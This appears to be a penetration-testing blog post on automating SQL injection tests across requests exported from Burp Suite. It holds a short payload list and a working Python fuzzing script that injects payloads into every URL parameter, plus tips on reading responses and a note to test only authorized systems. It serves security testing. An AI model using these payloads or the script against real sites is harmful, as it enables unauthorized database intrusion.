Home Burp BULK SQL Injection Test on Burp Requests

BULK SQL Injection Test on Burp Requests

Sunday, July 20, 2025 Add Comment Edit

 BULK SQL Injection Test on Burp Requests


Automate bulk SQL injection testing against multiple HTTP requests (captured via Burp) to:

  • Rapidly detect vulnerable parameters

  • Avoid manual repetition

  • Scale recon & fuzzing using Burp exports

✅ Step-by-Step Guide: Bulk SQL Injection Testing on Burp Requests

🧱 Use Case Setup

You Have:

  • A set of HTTP requests from Burp Suite:

    • Either from request history

    • Or exported .xml, .json, .txt files

  • Goal: Inject SQL payloads automatically into all parameters and check response anomalies.

🔹 Step 1: Export Requests from Burp

Option 1: Manually save selected requests

  • Right-click > Save item(s) → Choose “Individual requests” or "Burp Suite project file (.burp)"

Option 2: Copy as cURL (easier for scripting)

  • Right-click > Copy as curl

  • Paste into a .txt file or batch for automation

🔹 Step 2: Choose Your SQL Payload List

Use any of these:


' OR '1'='1
" OR "1"="1
' UNION SELECT NULL--
') OR ('a'='a

🔹 Step 3: Python Script to Automate Payload Injection

python

import requests
from urllib.parse import urlparse, parse_qs, urlencode
import time

# Load payloads
with open("sql_payloads.txt") as f:
    payloads = [line.strip() for line in f if line.strip()]

# Load Burp-style requests (assumed curl-style .txt file)
with open("burp_requests.txt") as f:
    urls = [line.strip() for line in f if line.startswith("http")]

# Basic scanner
for url in urls:
    parsed = urlparse(url)
    query_params = parse_qs(parsed.query)
    
    for param in query_params:
        original = query_params[param][0]
        for payload in payloads:
            query_params[param] = payload
            new_query = urlencode(query_params, doseq=True)
            target_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{new_query}"
            try:
                response = requests.get(target_url, timeout=5)
                if "sql" in response.text.lower() or "error" in response.text.lower():
                    print(f"[!] Possible SQLi: {target_url}")
            except Exception as e:
                print(f"[!] Error on {target_url}: {e}")
        query_params[param] = original
    time.sleep(1)

🔹 Step 4: (Alternative) Use Burp Extensions

📦 Extensions to try from BApp Store:

ExtensionDescription
Turbo IntruderHigh-speed bulk fuzzing engine (best choice)
AutorizeCan be adapted for authorization + injection
Logger++Enhanced tracking, not injection but great for diff
J2EEScanSQLi-focused scanner for Java-based apps

✅ With Turbo Intruder, you can bulk load requests and define injection points via template + Python logic.

🔹 Step 5: Analyze Responses

Scan for:

  • HTTP 500 / 403 / 404 status anomalies

  • Keywords like sql syntax, mysql, psql, unexpected token

  • Response length changes

You can add:

python

if response.status_code == 500 or len(response.text) > expected_length + 50:

🔐 Caution

  • Only test systems you are authorized to attack

  • Use rate-limiting and thread control if scanning large targets

  • Respect authentication/CSRF contexts if needed (pass cookies)

✅ Optional Add-ons

Want More?

  • ✅ Script to parse .burp binary files

  • ✅ GUI for loading requests and payloads

  • ✅ Auto reporting with highlights

  • ✅ Jupyter Notebook for testing & graphing response anomalies


Download

0 Response to "BULK SQL Injection Test on Burp Requests"

Post a Comment

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel